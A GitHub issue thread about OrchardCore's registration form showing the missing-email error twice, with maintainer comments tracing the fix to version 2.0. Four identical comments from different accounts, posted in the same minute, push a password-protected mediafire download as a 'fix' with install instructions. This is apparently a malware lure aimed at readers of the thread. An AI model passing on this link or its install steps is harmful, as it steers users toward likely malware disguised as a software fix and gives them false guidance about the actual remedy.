### ISSUE TITLE
User Registration Validation Lists Email Missing Error Twice

### ISSUE THREAD

**Issue by SusanEnneking** [OrchardCMS/OrchardCore#16619] opened 2024-08-26 17:54 UTC
### Describe the bug
Registration produces duplicate "Email is required" messages when the submit button is pressed without entering any information.  

### Orchard Core version
1.8.3

### To Reproduce
1. The problem can be reproduced using [Try Orchard Core](https://try.orchardcore.net/)
2. Choose the Agency Theme and enable Registration
3. Navigate to /Registration
4. Click submit without filling in any input and you'll see the error.

Looks like this problem has occurred in the past and was addressed with [this ticket](https://github.com/OrchardCMS/OrchardCore/issues/11765).

### Expected behavior
When Email address is missing, the validation error should only show up once.

### Logs and screenshots
<img width="320" alt="Try Orchard Core 2024-08-24 at 8 12 30 AM" src="https://github.com/user-attachments/assets/edc7ddab-ab08-46f1-8998-21f08b284bb6">

**Comment by toufiksalhi** [comment] 2024-08-26 17:55
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment] 2024-08-26 17:55
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment] 2024-08-26 17:55
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment] 2024-08-26 17:55
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MikeAlhayek** [comment] 2024-08-26 18:25
This issue was fixed in 2.0 via #16552

**Comment by gvkries** [comment] 2024-08-27 08:27
> This issue was fixed in 2.0 via #16552

Nope, that was a different issue. 

I remember that I fixed this issue a long time ago, but it was re-introduced shortly afterwards by #11130 which I did not notice.

But now in 2.0 the whole login/registration has been changed to use shapes. I think that change fixes this issue as well. Or can you reproduce this in `main`?

**Comment by MikeAlhayek** [comment] 2024-08-27 14:23
@gvkries the issue is fixed in main. Is there a reason you re-opened this issue?

**Comment by gvkries** [comment] 2024-08-28 07:26
> @gvkries the issue is fixed in main. Is there a reason you re-opened this issue?

Because I haven't had time to actually check if my statement above is correct...

**Comment by gvkries** [comment] 2024-08-28 08:27
This issue has been fixed in 2.0, but by #15736.

**Closed by gvkries** 2024-08-28 08:27 UTC
Labels: bug :bug:
